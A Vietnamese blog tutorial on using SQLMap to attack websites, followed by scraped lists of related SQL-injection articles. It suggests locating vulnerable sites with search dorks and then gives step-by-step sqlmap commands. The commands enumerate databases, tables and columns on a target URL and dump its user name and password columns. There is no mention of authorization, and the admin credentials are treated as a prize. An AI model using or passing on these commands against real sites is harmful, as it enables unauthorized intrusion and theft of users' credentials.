Hướng Dẫn Sử Dụng SQLMap - AnonyViet

Có thể bạn quan tâm

Bạn có thể dùng công cụ SQLMAP có sẵn trên Backtrack hoặc Kali, Windows. Đây là một trong những kỹ năng mà bất cứ ai hoạt động trong lĩnh vực security cũng phải biết.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Bạn có thể dùng một số dork để tìm 1 website bị lỗi SQL,

Các bài viết liên quan

Danh sách Payload SQL Injection

09/09/2023 - Updated on 24/07/2025 sqlmap nang cao

Cách sử dụng SQLMap nâng cao

01/05/2023 - Updated on 24/07/2025

Cách dùng Burp Suite khai thác SQL Injection

05/11/2022 - Updated on 24/07/2025

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022 - Updated on 24/07/2025

Hướng dẫn sử dụng SQLMap 5

VD: ta có 1 site như này http://www.xxxxxxxx.com/about.php?id=1

Giờ khởi động SQL bằng cách đánh lệnh (-h hoặc –help) vào cửa sổ console

Mã:

# sqlmap --help

Để xem được database ta dùng lệnh sau :

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs

-u = đường dẫn url –dbs = Liệt kê databases

Theo cái hình chình ình ở trên thì chúng ta thấy được ” unecuae_unec ” cái này là cái gì thì tôi ko cần nói nữa há

Giờ chúng ta tiếp tục với lệnh :

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables

-D = DBMS liệt kê dữ liệu –tables = liệt kê cái gì thì các bạn tự tìm hiểu hén…..

Sau khi tìm thấy 1 số ” bảng tuần hoàn hóa học ” chúng ta tiếp tục dụng lệnh để show hàng ra

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns

-T = DBMS lệnh lệt kê dữ liệu –columns = liệt kê cái gì thì các bạn tự tìm hiểu hén…..

Xem thêm: SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection

Đến đây là bạn đã có thể soi được quần chíp của bợn admin rầu đó )

Mã:

#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump

Tags: sql injectionsqlisqlmap

Từ khóa » Sử Dụng Sqlmap

Hướng Dẫn Sử Dụng SQLMap - AnonyViet

Các bài viết liên quan

Danh sách Payload SQL Injection

Cách sử dụng SQLMap nâng cao

Cách dùng Burp Suite khai thác SQL Injection

Hướng dẫn khai thác lỗi SQL Injection cơ bản

Sử Dụng SQLMap để Khai Thác Lỗ Hổng SQL Injection (SQLi) - Viblo

Khai Thác Lỗ Hổng SQL Injection Sử Dụng Sqlmap (Ở Mức độ Cơ Bản)

Hướng Dẫn Sử Dụng SQLMAP để Khai Thác SQL Injection

Hướng Dẫn Sử Dụng SQLmap Cơ Bản Cho Newbie

Sử Dụng Sqlmap Tấn Công SQL Injection Trong Kali Linux - W3seo

Sử Dụng SQLMAP để Khai Thác Lỗ Hỏng SQL Injection

Sử Dụng Sqlmap Cho Tấn Công Sql Injection

Viblo - Sử Dụng SQLMap để Khai Thác Lỗ Hổng SQL Injection...

Sử Dụng Sqlmap Cho Tấn Công Sql Injection

Hướng Dẫn Sử Dụng SQLMAP Trên Windows [SQL Injection]

Sử Dụng SQLmap Cho Tấn Công SQL Injection - An Ninh Mạng

Sử Dụng SQLmap

2022 Sqlmap Là Gì - Sử Dụng Sqlmap Để Khai Thác Lỗ Hỏng Sql ...

Sqlmap Là Gì – Hướng Dẫn Sử Dụng Sqlmap Cơ Bản Cho Newbie ...

Liên Hệ